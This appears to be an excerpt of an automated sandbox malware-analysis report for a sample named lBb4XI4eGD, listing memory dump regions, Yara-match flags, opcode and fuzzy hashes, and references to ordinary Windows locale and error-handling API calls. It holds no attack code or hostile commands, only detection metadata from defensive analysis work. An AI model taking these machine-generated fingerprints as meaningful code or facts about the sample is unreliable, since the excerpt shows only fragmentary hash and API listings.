                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: /
                                                                                                                                                                                                                                • API String ID: 0-2043925204
                                                                                                                                                                                                                                • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                • Instruction ID: 3adc650e711776362111ab5e43553b3f0cbdd7ddf1b9c00206e195fcc59ee936
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB414B725003196FCB20AFB9DC49EBBB778EB88314F10026EF915D7281EA749D41CB58
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430203,?,00000004), ref: 00435203
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                                • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                • API String ID: 2299586839-2904428671
                                                                                                                                                                                                                                • Opcode ID: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
                                                                                                                                                                                                                                • Instruction ID: 77d2a6705551c22c9c4f0428a2f6e8a78b6e695a94441c88a724e02477ae1ec3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3F09631A81318BBDF116F51DC02FAE7B65EF18B12F10416AFC0567290DA769920AA9D
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
                                                                                                                                                                                                                                • Instruction ID: 0ad69e39aeba236c0d49221ab1a26267bde0495b5b99c6820ae7b0df7967cb37
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44023E71E402199FDF14CFA9D884BADB7F2EF48314F25826AD919E7384D731A952CB80
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
                                                                                                                                                                                                                                • Instruction ID: 3e9e42cc23dfcbd4fdb8553ee609b72eaaad40ee2fbbc40375509bb09f17fb16
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B024D71E002299BDF14CFAAD9806AEFBF1EF48314F55416AD919E7340D734AD41CB94
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 02142622
                                                                                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 021427C0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageNtdllPostProc_QuitWindow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4264772764-0
                                                                                                                                                                                                                                • Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                                                                                                                                                • Instruction ID: 493c9cfd8739ae2239b8619ffbc1097a3daeb81baa697372f2d4100d17f67902
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45411F25964384A9E630EFA1BC45B2533B0FF54712F10652BE528CB2B2E7B28584C75E
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02176F11,?,?,00000008,?,?,0217F3D2,00000000), ref: 02177143
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                                                                                                • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                • Instruction ID: 9dd4a8a896dab4ccd63794ef542c2fa787b3fd783cd6ca58abc49636b5ad87f9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5EB14D316506089FD719CF28C48AB65BBF1FF85368F258658E899CF2E1C335E992CB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CAA,?,?,00000008,?,?,0043F16B,00000000), ref: 00436EDC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                                                                                                • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                • Instruction ID: 4bead90866a6a8306652f63e3edf2d2e70f9049ab2994a866b46465668e927e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13B15D35210609EFD715CF28C48AB657BE0FF09364F26D659E899CF2A1C339E992CB44
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02172131: GetLastError.KERNEL32(?,?,0216A9DC,?,00000000,?,0216CDD6,02142474,00000000,?,00451F20), ref: 02172135
                                                                                                                                                                                                                                  • Part of subcall function 02172131: _free.LIBCMT ref: 02172168
                                                                                                                                                                                                                                  • Part of subcall function 02172131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021721A9
                                                                                                                                                                                                                                  • Part of subcall function 02172131: _free.LIBCMT ref: 02172190
                                                                                                                                                                                                                                  • Part of subcall function 02172131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0217219D
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0217B8F0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2955987475-0
                                                                                                                                                                                                                                • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                                                                                                                                                • Instruction ID: 4c4db51b078d8d67452f05061dbc887eacf8b2b87d6cdd239b389895003a386c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3121837259420A9FDF249F24DC45BBA77B9EF84718F10017AEE11D6180EB39DB44CB50
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B689
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2955987475-0
                                                                                                                                                                                                                                • Opcode ID: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
                                                                                                                                                                                                                                • Instruction ID: 4c7343574116d105162f1c568ba8aea657e897f65ebfc7aca9760b93b0bda93a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA21863251020A9BDB249E26DC46BBB73A8EB48315F10117FFE01D6242EB79DD45CB99
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02172131: GetLastError.KERNEL32(?,?,0216A9DC,?,00000000,?,0216CDD6,02142474,00000000,?,00451F20), ref: 02172135
                                                                                                                                                                                                                                  • Part of subcall function 02172131: _free.LIBCMT ref: 02172168
                                                                                                                                                                                                                                  • Part of subcall function 02172131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021721A9
                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0043B3E5,00000001,00000000,?,02170A0C,?,0217BC79,00000000,?,?,?), ref: 0217B596
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2016158738-0
                                                                                                                                                                                                                                • Opcode ID: 8237f41eeff90cd2040f98b437445f2213d719484cbab9627a3f33809c66f75c
                                                                                                                                                                                                                                • Instruction ID: 60a06621fa92aeb98c9b80eb12b51505d127609a5b7f058cf3dd082bba673b2b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8237f41eeff90cd2040f98b437445f2213d719484cbab9627a3f33809c66f75c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA11E9372047055FDB189F39C8916BABBA2FFC4359F15452DEA4687740D771A643CB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0043B3E5,00000001,00000000,?,004307A5,?,0043BA12,00000000,?,?,?), ref: 0043B32F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2016158738-0
                                                                                                                                                                                                                                • Opcode ID: 9dfe4f960725340af2dbd28f6025354d562524789b7736a7d15e08a761a9ce4d
                                                                                                                                                                                                                                • Instruction ID: 9dc9256a404de3575a93206041da1aaaa21de42e5a9a86f68168da1acedf184b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9dfe4f960725340af2dbd28f6025354d562524789b7736a7d15e08a761a9ce4d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E1129372007019FDB189F39C89577BB791FF88318F15452EEA8687B40E3756902C784
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02172131: GetLastError.KERNEL32(?,?,0216A9DC,?,00000000,?,0216CDD6,02142474,00000000,?,00451F20), ref: 02172135
                                                                                                                                                                                                                                  • Part of subcall function 02172131: _free.LIBCMT ref: 02172168
                                                                                                                                                                                                                                  • Part of subcall function 02172131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021721A9
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0217B86A,00000000,00000000,?), ref: 0217BAF8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 787680540-0
                                                                                                                                                                                                                                • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                • Instruction ID: 6b2e26e8b072f9e50cc818653398443a62eedefe129388cb462f7b731f939c7f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EAF0F432A88115ABDB389A248C09BBB7778EB8071CF054429ED46A3144EB70BF02C6D0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02172131: GetLastError.KERNEL32(?,?,0216A9DC,?,00000000,?,0216CDD6,02142474,00000000,?,00451F20), ref: 02172135
                                                                                                                                                                                                                                  • Part of subcall function 02172131: _free.LIBCMT ref: 02172168
                                                                                                                                                                                                                                  • Part of subcall function 02172131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021721A9
                                                                                                                                                                                                                                  • Part of subcall function 02172131: _free.LIBCMT ref: 02172190
                                                                                                                                                                                                                                  • Part of subcall function 02172131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0217219D
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0217B8F0
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$_free$InfoLocale
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2955987475-0
                                                                                                                                                                                                                                • Opcode ID: a77c493685e21e679bf0160ea981175eadb5409386be25bb118e424e5fd7eabe
                                                                                                                                                                                                                                • Instruction ID: 99c18a6cd625a5bb6d2e78969c81e62b55c3428bb546f47e1842cfaf9279a23d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a77c493685e21e679bf0160ea981175eadb5409386be25bb118e424e5fd7eabe
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE01F232A852159BCB14AF34DC84ABA33B9EF45714F0041BAEE02DB281DB359E018B50
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B603,00000000,00000000,?), ref: 0043B891
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$InfoLocale_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 787680540-0
                                                                                                                                                                                                                                • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                • Instruction ID: 482b5923cda5358eb0558da95ee496ac7efb878bedc9635b3893494dc5c9647c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DF0F932910116ABDB2CAA658C057BB775CEF44714F15542AEE05A3280EB39BE4586D8
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02172131: GetLastError.KERNEL32(?,?,0216A9DC,?,00000000,?,0216CDD6,02142474,00000000,?,00451F20), ref: 02172135
                                                                                                                                                                                                                                  • Part of subcall function 02172131: _free.LIBCMT ref: 02172168
                                                                                                                                                                                                                                  • Part of subcall function 02172131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021721A9
                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0043B635,00000001,?,?,02170A0C,?,0217BC3D,02170A0C,?,?,?,?,?,02170A0C,?,?), ref: 0217B60B
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2016158738-0
                                                                                                                                                                                                                                • Opcode ID: e06cfec9a80bc9ac23b08667c324c5a64add62556f7a7039edbc764c084a7627
                                                                                                                                                                                                                                • Instruction ID: 68f69a1321aa4a2d1d3a61aeb51633949e78ccc2cf56bd8ee0e2cd8b2333c7b1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e06cfec9a80bc9ac23b08667c324c5a64add62556f7a7039edbc764c084a7627
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96F022363043041FDB145F398C80B7A7BA2EFC032CF15442CFA068B680E77199028B44
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                  • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0043B635,00000001,?,?,004307A5,?,0043B9D6,004307A5,?,?,?,?,?,004307A5,?,?), ref: 0043B3A4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2016158738-0
                                                                                                                                                                                                                                • Opcode ID: 195a4d8fd23d0ae4e4fd4f8fbfc6d5bb400bfe136b198b29952dc109111c3991
                                                                                                                                                                                                                                • Instruction ID: 4cae78c4b35d7b4c31765c23ce642d4c98f9d5783de0998693dc6c617ff1b9a7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 195a4d8fd23d0ae4e4fd4f8fbfc6d5bb400bfe136b198b29952dc109111c3991
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65F0C2362003045FDB149F399C92B7A7B95EF85768F15452EFE058B690D7B59C028788
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0217046A,?,00000004), ref: 0217546A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                                                                                                                • Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                • Instruction ID: f410d04b1545ec243da92c0666db2d4a854b934a3c536c4252360ce7efa6cd26
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73F0F631680318BFDB016F60DC05F6E7B72EF44B12F504025FD0666290DB718920AA89
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0216E644: RtlEnterCriticalSection.NTDLL(01CF0DA5), ref: 0216E653
                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00434D77,00000001,00457BB8,0000000C), ref: 0217505C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1272433827-0
                                                                                                                                                                                                                                • Opcode ID: 2e288edd502f9338f3ae6bdb24e1004f28b1c1fe82cd5b945011e905dedca8aa
                                                                                                                                                                                                                                • Instruction ID: b650539f1a7145abfb83d3c358c9f770ecf1333648eba4b2f494e19c44a682fb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e288edd502f9338f3ae6bdb24e1004f28b1c1fe82cd5b945011e905dedca8aa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88F08C32A50300EFEB00EF68D905B5C37F1AB09711F104266F910DB2A5C77999508F49
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0042E3DD: EnterCriticalSection.KERNEL32(?,?,00431C6A,?,00457A38,00000008,00431D38,?,?,?), ref: 0042E3EC
                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00434D77,00000001,00457BB8,0000000C), ref: 00434DF5
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1272433827-0
                                                                                                                                                                                                                                • Opcode ID: 7da8f678658031ff63e6598b04d2e059f169cb2088b28189ead69b8e5d7f05eb
                                                                                                                                                                                                                                • Instruction ID: c332caa31248a9acf2554114107b558261535c1db87f4a35068870b0348f85c5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7da8f678658031ff63e6598b04d2e059f169cb2088b28189ead69b8e5d7f05eb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30F04F32A103049FD710EF69E906B8D37F0AB05726F10426AF914DB2E2CBB999808F49
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 02172131: GetLastError.KERNEL32(?,?,0216A9DC,?,00000000,?,0216CDD6,02142474,00000000,?,00451F20), ref: 02172135
                                                                                                                                                                                                                                  • Part of subcall function 02172131: _free.LIBCMT ref: 02172168
                                                                                                                                                                                                                                  • Part of subcall function 02172131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021721A9
                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0043B1C9,00000001,?,?,?,0217BC9B,02170A0C,?,?,?,?,?,02170A0C,?,?,?), ref: 0217B510
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
